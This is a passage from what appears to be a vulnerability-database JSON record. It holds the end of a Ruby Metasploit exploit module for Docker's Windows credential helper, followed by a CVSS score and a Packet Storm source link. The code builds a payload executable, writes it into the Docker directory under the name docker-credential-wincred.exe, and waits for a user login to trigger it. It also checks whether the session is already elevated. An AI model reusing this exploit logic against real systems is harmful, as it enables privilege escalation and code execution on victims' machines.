\nfail_with(Failure::NotFound, 'Vulnerable Docker path is not on system') unless directory?(docker_path) \npayload_name = 'docker-credential-wincred.exe' \npayload_pathname = \"#{docker_path}\\\\#{payload_name}\" \nvprint_status('Making Payload') \npayload = generate_payload_exe \n \n# upload Payload \nvprint_status(\"Uploading Payload to #{payload_pathname}\") \nwrite_file(payload_pathname, payload) \nvprint_status('Payload Upload Complete') \nprint_status('Waiting for user to attempt to login') \nend \n \ndef check_permissions! \nunless check == Exploit::CheckCode::Appears \nfail_with(Failure::NotVulnerable, 'Target is not vulnerable.') \nend \nfail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system? \n# Check if you are an admin \n# is_in_admin_group can be nil, true, or false \nend \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/157404/docker_credential_wincred.rb.txt"}]}
